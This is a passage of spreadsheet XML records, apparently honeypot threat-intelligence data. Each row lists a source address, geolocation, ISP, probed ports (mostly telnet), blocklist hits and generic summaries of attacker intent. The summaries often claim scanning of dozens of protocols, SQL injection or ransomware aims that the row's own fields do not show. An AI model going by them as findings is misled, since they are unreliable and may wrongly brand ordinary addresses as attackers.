    <s v="2025-11-16 00:00:00"/>
    <s v="2020-11-19 00:00:00"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="published"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a4a3:3d5b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1205"/>
    <x v="1205"/>
    <s v="59-126-126-72.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-20T05:11:35"/>
    <d v="2024-11-21T16:27:57"/>
    <d v="2025-04-20T05:11:35"/>
    <n v="417"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H22"/>
    <s v="80&amp;&amp;23&amp;&amp;64518&amp;&amp;NA&amp;&amp;60663&amp;&amp;44030&amp;&amp;44043&amp;&amp;44059"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:7e48"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="It appears that an attacker is attempting to scan and exploit various network services, including web servers, databases, and other systems. The attacker seems to be using a range of techniques, including password guessing, SQL injection, and exploitation of vulnerabilities in specific software packages. &amp;&amp; Based on the logs, it appears that an attacker is scanning and probing various services for potential vulnerabilities. They are attempting to exploit these weaknesses by sending malicious requests and commands."/>
    <s v="  &amp;&amp; The attacker's goal seems to be to gain unauthorized access to systems and networks, likely for malicious purposes such as data theft or ransomware attacks."/>
  </r>
  <r>
    <x v="1206"/>
    <x v="1206"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T05:01:26"/>
    <d v="2025-04-20T05:01:26"/>
    <d v="2025-04-20T05:01:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="NA"/>
    <s v="21.1959"/>
    <s v="72.8302"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:9730"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is scanning for open services and probing various protocols to identify potential vulnerabilities. They are also attempting to gain unauthorized access by sending malicious requests, such as login attempts, password cracking, and data extraction. &amp;&amp; The attacker is attempting to scan and exploit various services on the network, using different protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. "/>
    <s v="**Password Cracking Attempt** &amp;&amp;  "/>
  </r>
  <r>
    <x v="1207"/>
    <x v="1207"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T05:01:17"/>
    <d v="2024-07-10T00:25:00"/>
    <d v="2025-04-20T05:01:17"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;51781&amp;&amp;52048&amp;&amp;53382&amp;&amp;52346&amp;&amp;54729&amp;&amp;1433&amp;&amp;80&amp;&amp;50334&amp;&amp;6667&amp;&amp;443&amp;&amp;55519&amp;&amp;56203&amp;&amp;56862&amp;&amp;55004&amp;&amp;1080"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="GET&amp;&amp;NA&amp;&amp;connection&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:84e9"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is scanning the network for available services and attempting to exploit vulnerabilities in various systems, including web servers, databases, and other network devices. They are also trying to gain unauthorized access by sending malicious login attempts and exploiting weaknesses in authentication protocols."/>
    <m/>
  </r>
  <r>
    <x v="1208"/>
    <x v="1208"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T22:21:09"/>
    <d v="2025-04-13T02:37:15"/>
    <d v="2025-04-19T22:21:09"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:3d2d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1209"/>
    <x v="1209"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T22:10:17"/>
    <d v="2025-02-09T18:24:56"/>
    <d v="2025-04-19T22:10:17"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;58185&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="business"/>
    <s v="broadNnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b441:7f8a"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1210"/>
    <x v="1210"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T22:05:10"/>
    <d v="2025-04-19T22:05:10"/>
    <d v="2025-04-19T22:05:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="VIC"/>
    <s v="Victoria"/>
    <s v="Melbourne"/>
    <s v="Melbourne"/>
    <s v="2158177"/>
    <s v="3001"/>
    <s v="-37.8136"/>
    <s v="144.963"/>
    <s v="1221"/>
    <s v="ASN-TELSTRA"/>
    <s v="Telstra Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:789d:f01c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to gather information about the network and its services, likely for reconnaissance purposes. They are probing various ports and services, including DNS, FTP, HTTP, HTTPS, IMAP, IPP, and others, using different protocols and syntaxes."/>
    <s v="They are also attempting to authenticate with certain services, such as SMB and SMTP, and are sending suspicious commands and data, indicating a potential malicious intent."/>
  </r>
  <r>
    <x v="1211"/>
    <x v="1211"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T18:05:53"/>
    <d v="2025-04-18T22:08:11"/>
    <d v="2025-04-19T18:05:53"/>
    <n v="47"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="5900&amp;&amp;54494"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Depok"/>
    <s v="Pamulang"/>
    <s v="1632937"/>
    <s v="NA"/>
    <s v="-6.34212"/>
    <s v="106.787"/>
    <s v="9341"/>
    <s v="PT Indonesia Comnets Plus"/>
    <s v="ICONPLN"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2017-05-30"/>
    <s v="ICONPLN-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:675e:2e6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is scanning for open services on the network, attempting to identify vulnerable systems and gain access. They are sending probes to various ports, gathering information about the target systems, including service versions and configurations. &amp;&amp; It appears that the attacker is conducting a reconnaissance and scanning activity, attempting to gather information about the system's services and configurations. They are likely using various protocols (such as DNS, HTTP, FTP, etc.) to probe for vulnerabilities and identify potential entry points. &amp;&amp; The attacker is scanning the network for available services and testing login credentials, likely using a brute force attack to gain unauthorized access. &amp;&amp; The attackers are attempting to gain unauthorized access and reconnaissance of the targeted systems, exploiting various vulnerabilities and weaknesses in the network services. They seem to be using a combination of automated tools and manual probing to identify potential entry points."/>
    <s v="Port scanning &amp;&amp;   &amp;&amp; UDP Flood &amp;&amp;  "/>
  </r>
  <r>
    <x v="1212"/>
    <x v="1212"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T15:25:18"/>
    <d v="2025-04-17T11:19:16"/>
    <d v="2025-04-19T15:25:18"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="NA"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0082"/>
    <s v="28.9784"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="2004-09-20"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5569:d48"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to probe and exploit various services on the network, likely for reconnaissance or initial access purposes. They are sending requests to numerous ports and services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET."/>
    <s v=" Port scanning and enumeration"/>
  </r>
  <r>
    <x v="1213"/>
    <x v="1213"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T15:10:06"/>
    <d v="2025-04-05T16:41:56"/>
    <d v="2025-04-19T15:10:06"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="Railtel"/>
    <s v="2015-11-04"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b6f:4a01"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Based on the logs, it appears that an attacker is attempting to enumerate and exploit various services on a network. They are using a variety of protocols, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, Redis, SIP, SMB, SMTP, SNMP, and others."/>
    <s v="The attacker is sending reconnaissance probes to identify open ports and services on the network. They are also attempting to authenticate with various usernames and passwords, including weak ones like &quot;Administrator&quot;. Additionally, they are trying to exploit vulnerabilities in some of these services."/>
  </r>
  <r>
    <x v="1214"/>
    <x v="1214"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T15:02:53"/>
    <d v="2023-12-05T09:16:00"/>
    <d v="2025-04-19T15:02:53"/>
    <n v="159"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MT-CPA_H42"/>
    <s v="1433&amp;&amp;22&amp;&amp;18072"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Medchal Malkajgiri"/>
    <s v="Malkajgiri"/>
    <s v="7302828"/>
    <s v="NA"/>
    <s v="17.4478"/>
    <s v="78.5263"/>
    <s v="55577"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd."/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="2009-11-10"/>
    <s v="Beam-BRAS-Pools"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b753:87a9"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The observed activities suggest that the attackers are attempting to reconnoiter and exploit various network services for potential vulnerabilities. They appear to be scanning for open ports, identifying service versions, and probing for login credentials. The presence of malicious user agent strings and unusual request patterns further indicates a reconnaissance phase aimed at gathering information for future attacks."/>
    <m/>
  </r>
  <r>
    <x v="1215"/>
    <x v="1215"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T15:02:53"/>
    <d v="2025-04-19T15:02:53"/>
    <d v="2025-04-19T15:02:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="JH"/>
    <s v="Jharkhand"/>
    <s v="Bokaro"/>
    <s v="Bhojudih"/>
    <s v="1275866"/>
    <s v="NA"/>
    <s v="23.6396"/>
    <s v="86.441"/>
    <s v="55836"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="Reliancejio"/>
    <s v="consumer"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983a:ba51"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan and exploit various network services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP. They are using tools to send probes and identify potential vulnerabilities in these services. &amp;&amp; The attacker is attempting to scan and identify available services on the network, probing various ports for open connections. They are also trying to authenticate with different usernames and passwords, and possibly attempting to exploit vulnerabilities in certain services."/>
    <s v="The attacker is likely performing a reconnaissance operation to gather information about the target network and systems, which can be used for further exploitation and attack. &amp;&amp; Port scanning is being performed on multiple services including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and MySQL. This activity indicates that the attacker is trying to gather information about the network infrastructure and identify potential entry points."/>
  </r>
  <r>
    <x v="1216"/>
    <x v="1216"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T14:11:34"/>
    <d v="2024-04-12T16:26:00"/>
    <d v="2025-04-19T14:11:34"/>
    <n v="45"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H37"/>
    <s v="23&amp;&amp;16019&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ET"/>
    <s v="Ethiopia"/>
    <s v="AA"/>
    <s v="Addis Ababa"/>
    <s v="Arada"/>
    <s v="Addis Ababa"/>
    <s v="344979"/>
    <s v="NA"/>
    <s v="9.02427"/>
    <s v="38.7519"/>
    <s v="24757"/>
    <s v="EthioNet"/>
    <s v="Ethiotelecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4bf:6810"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1217"/>
    <x v="1217"/>
    <s v="NA&amp;&amp;c4-131.i07-2.onvol.net"/>
    <x v="0"/>
    <d v="2025-04-19T14:01:14"/>
    <d v="2025-04-14T14:33:32"/>
    <d v="2025-04-19T14:01:14"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="MT"/>
    <s v="Malta"/>
    <s v="55"/>
    <s v="Is-Siġġiewi"/>
    <s v="NA"/>
    <s v="Siġġiewi"/>
    <s v="2562504"/>
    <s v="NA"/>
    <s v="35.8556"/>
    <s v="14.4364"/>
    <s v="12709"/>
    <s v="Melita Limited"/>
    <s v="Melita Ltd"/>
    <s v="residential"/>
    <s v="Melita plc"/>
    <s v="2007-11-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5cfb:483"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1218"/>
    <x v="1218"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T14:01:13"/>
    <d v="2025-04-16T23:18:54"/>
    <d v="2025-04-19T14:01:13"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
